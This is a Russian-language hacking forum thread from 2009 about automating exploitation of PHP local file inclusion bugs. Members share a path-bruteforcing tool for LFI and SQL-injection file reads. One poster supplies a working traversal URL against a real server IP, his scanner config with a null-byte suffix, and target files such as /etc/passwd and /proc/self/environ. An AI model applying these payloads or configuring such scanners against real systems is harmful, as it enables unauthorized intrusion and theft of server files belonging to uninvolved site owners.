ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Надо написать автоинклудер на PHP |
29.06.2009, 13:44
|
|
Banned
Регистрация: 23.06.2009
Сообщений: 89
Провел на форуме:
347165
Репутация:
-67
|
|
Надо написать автоинклудер на PHP
Когда используют багу Php include, то нередко ищут конфигуруционые файлы и логи. Есть список путей к ним. Надо написать срипт который будет перебирать их. Подскажите как это реализовать? и может быть есть готовый?
|
|
|
29.06.2009, 15:30
|
|
Участник форума
Регистрация: 19.05.2007
Сообщений: 228
Провел на форуме:
4325663
Репутация:
240
|
|
пыщь
https://forum.antichat.ru/showthread.php?p=802722
|
|
|
|
29.06.2009, 16:42
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
свой юзаю:
Парсер логов, работает в нескольких режимах:
MODE = 1 - имеется LFI, при неправильном запросе ВИДЕН текст ошибки
MODE = 2 - имеется LFI, при неправильном запросе НЕ ВИДЕН текст ошибки (ниже требуется ввести URL, вызывающий ошибку)
MODE = 3 - имеется SQL-INJ + file_priv=Y + magic_quotes=OFF, при неправильном запросе ВИДЕН текст ошибки
MODE = 4 - имеется SQL-INJ + file_priv=Y + magic_quotes=OFF, при неправильном запросе НЕ ВИДЕН текст ошибки (ниже требуется ввести URL, вызывающий ошибку)
MODE = 5 - имеется SQL-INJ + file_priv=Y + magic_quotes=ON, при неправильном запросе ВИДЕН текст ошибки
MODE = 6 - имеется SQL-INJ + file_priv=Y + magic_quotes=ON, при неправильном запросе НЕ ВИДЕН текст ошибки (ниже требуется ввести URL, вызывающий ошибку)
все настройки задаются в файле phpinj.ini
словарь логов находится в файле logs.txt
запускается при помощи RUN!!!.cmd под WIN или plp.php под LINUX ( т.е. исходники в комплекте)
В результате сканирования будут созданы два файла:
1. Имя_хоста_RESULTS.txt - файл с результатами запросов
2. Имя_хоста_URL.txt - файл с прочеканными и выдавшими результат url
В комплекте примеры phpinj.ini для разных режимов работы программы
Скачать |
|
|
|
01.07.2009, 21:50
|
|
Banned
Регистрация: 23.06.2009
Сообщений: 89
Провел на форуме:
347165
Репутация:
-67
|
|
Большое Вам спасибо. Pashkela, подскажи плиз как юзать твой скрипт, в какой файлег вбивать урл и т.д.?
ЗЫ
LFI - это и есть локальный инклуд
Последний раз редактировалось nub-hacker; 01.07.2009 в 22:11..
|
|
|
|
01.07.2009, 22:11
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Жесть, Pashkela все объяснил более чем понятно, а ты переспрашиваешь еще...
|
|
|
|
01.07.2009, 22:38
|
|
Banned
Регистрация: 23.06.2009
Сообщений: 89
Провел на форуме:
347165
Репутация:
-67
|
|
Люди добрые, помогите заюзать.
Вот инклуд. http://137.207.248.30/60-270/php/viewsource.php?fname=../../../../../../../etc/passwd
в phpinj.ini вставляю
;=========================================
MODE = 1 ; <= режим сканирования
;MODE = 1 - имеется LFI, при неправильном запросе ВИДЕН текст ошибки
;MODE = 2 - имеется LFI, при неправильном запросе НЕ ВИДЕН текст ошибки (ниже требуется ввести URL, вызывающий ошибку)
;MODE = 3 - имеется SQL-INJ + file_priv=Y + magic_quotes=OFF, при неправильном запросе ВИДЕН текст ошибки
;MODE = 4 - имеется SQL-INJ + file_priv=Y + magic_quotes=OFF, при неправильном запросе НЕ ВИДЕН текст ошибки (ниже требуется ввести URL, вызывающий ошибку)
;MODE = 5 - имеется SQL-INJ + file_priv=Y + magic_quotes=ON, при неправильном запросе ВИДЕН текст ошибки
;MODE = 6 - имеется SQL-INJ + file_priv=Y + magic_quotes=ON, при неправильном запросе НЕ ВИДЕН текст ошибки (ниже требуется ввести URL, вызывающий ошибку)
;=========================================
; url-для сканирования (начало):
;----------------------------------------------------------------------------------------------------
URL = "http://137.207.248.30/60-270/php/viewsource.php?fname=../../../../../../../"
;----------------------------------------------------------------------------------------------------
; url, которая вызывает ошибку (включая окончание, полная ссылка):
;----------------------------------------------------------------------------------------------------
ERROR_URL = "http://137.207.248.30/60-270/php/viewsource.php?fname=../../../../../../../etc/passwd1"
;----------------------------------------------------------------------------------------------------
; окончание url-для сканирования:
;----------------------------------------------------------------------------------------------------
URL_END = "%00"
;----------------------------------------------------------------------------------------------------
; Текст ошибки, при вызове ошибочной страницы, четко показывающая, что искомый параметр не найден (если ошибки видны)
; Если в тексте ошибки есть символы, отличные от букв или цифр - ошибку следует заключить в двойные кавычки.
;----------------------------------------------------------------------------------------------------
ERROR_MESSAGE = Error: ../../../../../../../etc/passwd1 does not exist!
;----------------------------------------------------------------------------------------------------
PAUSE = 0 ; Пауза между запросами
не раб. (((((
точнее оооочень медленно перебераются каталоги (((
C:\WebServers\home\localhost\www\plp>cmd /k plp.exe
/etc/passwd
/proc/self/environ |
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
